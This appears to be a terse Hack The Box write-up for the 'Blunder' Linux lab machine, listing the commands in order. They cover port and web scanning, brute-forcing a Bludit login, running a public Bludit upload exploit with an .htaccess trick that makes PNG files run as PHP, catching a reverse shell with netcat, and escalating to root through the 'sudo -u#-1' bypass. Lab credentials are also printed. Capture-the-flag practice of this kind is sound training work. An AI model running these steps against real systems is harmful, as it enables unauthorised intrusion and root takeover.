Cu3rv0x
Blunder

Blunder


HTB Linux

nmap -A -p- -oA output 10.129.95.225 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA blunder 10.129.95.225

nmap -sU -O -p- -oA blunder-udp 10.129.95.225

nikto -h 10.129.95.225:80

ssh_command.

ssh_command.

whatweb http://10.129.95.225

ssh_command.

searchsploit bludit

ssh_command.

http://10.129.95.225

ssh_command.

wfuzz -c -t 400 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.95.225/FUZZ

ssh_command.

http://10.129.95.225/admin

ssh_command.

http://10.129.95.225/todo.txt

ssh_command.

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u “http://10.129.95.225/FUZZ” -e .txt -t 30

ssh_command. ssh_command.

cewl -w dictionary.txt http://10.129.95.225

ssh_command.

python3 bruteforcer.py

Credenciales-> fergus:RolandDeschain

ssh_command.

http://10.129.95.225/admin/dashboard

ssh_command.

cat bruteforcer.py

ssh_command. ssh_command.

searchsploit -m 48701

ssh_command.

cat bludit_exploit.py

cat evil.png)

ssh_command.

echo “RewriteEngine off” > .htaccess

echo “Addtype application/x-httpd-php .png” >> .htaccess

python3 bludit exploit.py

ssh_command.

http://10.129.95.225/bl-content/tmp/temp/

ssh_command.

nc -lvnp 443

ssh_command.

Credenciales-> hugo:Password120

ssh_command.

su hugo

sudo -l

sudo -u#-1 /bin/bash

ssh_command.

© 2025 Cu3rv0x